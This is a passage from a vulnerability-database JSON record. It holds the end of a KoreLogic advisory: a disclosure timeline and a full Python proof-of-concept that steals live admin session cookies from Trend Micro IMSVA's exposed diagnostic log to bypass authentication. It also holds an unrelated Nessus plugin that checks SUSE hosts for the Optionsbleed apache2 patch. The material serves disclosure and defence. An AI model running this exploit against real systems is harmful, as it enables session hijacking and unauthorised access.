Expected release date is late January 2018.\r\n 2018.01.18 - Trend Micro notifies KoreLogic that the expected release\r\n date for the IMSVA 9.0 Critical Patch and the advisory\r\n is to be January 31, 2018.\r\n 2018.01.23 - 110 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2018.01.31 - Trend Micro releases the advisory associated with this\r\n vulnerability and the related Critical Patches.\r\n 2018.02.08 - KoreLogic public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n#!/usr/bin/python3\r\n\r\n\r\nfrom argparse import ArgumentParser\r\nfrom ssl import _create_unverified_context\r\nfrom time import mktime\r\nfrom urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener\r\n\r\n\r\nbanner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass\r\n{}'''.format('-'*67)\r\n\r\n\r\nclass Exploit:\r\n def __init__(self, args):\r\n self.target_host = args.host\r\n self.target_port = args.port\r\n self.list_all = args.ls\r\n self.sessions = []\r\n self.session_latest_time = None\r\n self.session_latest_id = None\r\n self.sessions_active = []\r\n return None\r\n\r\n def is_target(self):\r\n url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))\r\n url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))\r\n if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:\r\n try:\r\n urlopen(url_loginjsp, context=_create_unverified_context())\r\n except HTTPError as e:\r\n if e.code == 403:\r\n return True\r\n else:\r\n return False\r\n return False\r\n\r\n def get_sessions(self):\r\n url_vulnpage = Request('https://{}:{}/widget/repository/log/diagnostic.log'.format(self.target_host,\r\nself.target_port))\r\n vuln_obj = urlopen(url_vulnpage, context=_create_unverified_context())\r\n if vuln_obj.getcode() == 200:\r\n vuln_pagedata = vuln_obj.read()\r\n for line in 
vuln_pagedata.decode('utf8').split('\\n'):\r\n if 'product_auth' in line and 'JSEEEIONID' in line:\r\n self.sessions.append((line.split(',')[0], line.split(',')[-1].split(' ')[1].split(':')[1]))\r\n else:\r\n return False\r\n return True\r\n\r\n def find_latest(self):\r\n for session in list(set(self.sessions)):\r\n year, month, day = session[0].split(' ')[0].split('-')\r\n hour, minute, second = session[0].split(' ')[1].split(':')\r\n session_time = mktime((int(year), int(month), int(day), int(hour), int(minute), int(second), 0, 0, 0))\r\n if self.session_latest_time is None:\r\n self.session_latest_time = session_time\r\n if session_time > self.session_latest_time:\r\n self.session_latest_time = session_time\r\n self.session_latest_id = session[1]\r\n if self.list_all:\r\n if self.is_session_alive():\r\n self.sessions_active.append((self.session_latest_time, self.session_latest_id))\r\n return True\r\n\r\n def is_session_alive(self):\r\n url_consolepage = Request('https://{}:{}/console.imss'.format(self.target_host, self.target_port))\r\n opener = build_opener(HTTPSHandler(context=_create_unverified_context()))\r\n opener.addheaders.append(('Cookie', 'JSESSIONID={}'.format(self.session_latest_id)))\r\n console_obj = opener.open(url_consolepage)\r\n if console_obj.getcode() == 200:\r\n console_pagedata = console_obj.read().decode('utf8')\r\n if 'parent.location.href=\"/timeout.imss\"' in console_pagedata:\r\n return False\r\n else:\r\n return False\r\n return True\r\n\r\n def run(self):\r\n if self.is_target():\r\n if self.get_sessions():\r\n print('[-] Leaked {} sessions'.format(len(self.sessions)))\r\n self.find_latest()\r\n if self.list_all and self.sessions_active:\r\n print('[+] Active sessions leaked.')\r\n sessions = []\r\n for entry in list(set(self.sessions_active)):\r\n sessions.append(entry[1])\r\n for session in list(set(sessions)):\r\n print('Set-Cookie: JSESSIONID={}'.format(session))\r\n elif self.is_session_alive():\r\n print('[+] Active session 
leaked.')\r\n print('Set-Cookie: JSESSIONID={}'.format(self.session_latest_id))\r\n return True\r\n else:\r\n print('[-] {} sessions leaked but none are active.'.format(len(self.sessions)))\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n print(banner)\r\n arg_parser = ArgumentParser(add_help=False)\r\n arg_parser.add_argument('-H', '--help', action='help', help='Help')\r\n arg_parser.add_argument('-h', '--host', default=None, required=True, help='Target host')\r\n arg_parser.add_argument('-p', '--port', default=8445, type=int, help='Target port')\r\n arg_parser.add_argument('-l', '--ls', action='store_true', default=False, help='List all sessions (noisy)')\r\n\r\n args = arg_parser.parse_args()\r\n\r\n Exploit(args).run()\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2018\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29759"}], "nessus": [{"lastseen": "2019-11-03T12:19:19", "bulletinFamily": "scanner", "description": "This update for apache2 fixes one issues. 
This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-2718-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103833", "published": "2017-10-13T00:00:00", "title": "SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2718-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103833);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/09/11 11:22:16\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes one issues. This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9798/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172718-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b3bb4ad6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1682=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1682=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1682=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debugsource-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-example-pages-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-debuginfo-2.4.16-20.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}